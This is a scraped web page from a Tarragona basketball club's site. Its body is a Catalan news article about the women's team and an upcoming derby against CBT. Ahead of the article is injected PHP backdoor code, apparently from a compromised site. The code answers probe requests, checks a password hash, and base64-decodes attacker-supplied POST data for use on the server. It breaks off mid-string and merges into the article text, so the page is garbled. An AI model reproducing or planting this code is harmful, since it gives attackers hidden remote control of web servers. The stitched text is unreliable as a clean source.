function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet espera el suport de la seva afició en el derbi d'aquest dissabte al Serrallo - Tgn Bàsquet Club -

El Nemser TGN Bàsquet espera el suport de la seva afició en el derbi d’aquest dissabte al Serrallo

By
Updated: gener 7, 2015

Serà el primer. El Nemser TGN Bàsquet i el CBT encara no s’havien trobat aquesta temporada en la lliga de la primera catalana femenina. Aquest dissabte, al pavelló del Serrallo, hi haurà la primera cita (20.30 h) entre els dos equips femenins més potents de la ciutat i on la rivalitat és tot un clàssic. “No és un partit més. Tothom vol guanyar a l’altre equip perquè ens coneixem tots i hem jugat moltes vegades els uns contra els altres. És un dia en què, si guanyes, marxes més content d’allò que és habitual. Psicològicament per les jugadores que guanyin serà un punt positiu”, assegura el tècnic del Nemser TGN Bàsquet, Jordi Hernández.

Ara per ara, el conjunt lila és vuitè amb un balanç de 6 victòries i 6 derrotes, mentre que el CBT ocupa la quarta posició amb 9 i 3. La classificació i el fet que l’equip blau jugui a la seva pista pot ser un handicap per les noies d’Hernández, que demana el suport de l’afició del TGN Bàsquet per tal d’aconseguir la victòria: “Si mirem els nostres resultats a casa, es pot veure que rendim millor i, per tant, tot el suport que puguem rebre de la nostra afició allà serà molt benvingut”.

L’any passat, el duel entre ambdós equips va acabar igualat perquè cadascun va vèncer a la seva pista: 57-46 pel CBT al Serrallo i 51-46 pel Nemser TGN Bàsquet al pavelló del Sagrat Cor.  “Començar l’any amb un derbi és escalfar motors amb ganes. Afrontar un partit d’aquest pes psicològic serà important per veure quines sensacions agafem en vista el que queda de temporada”, diu Hernández.

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *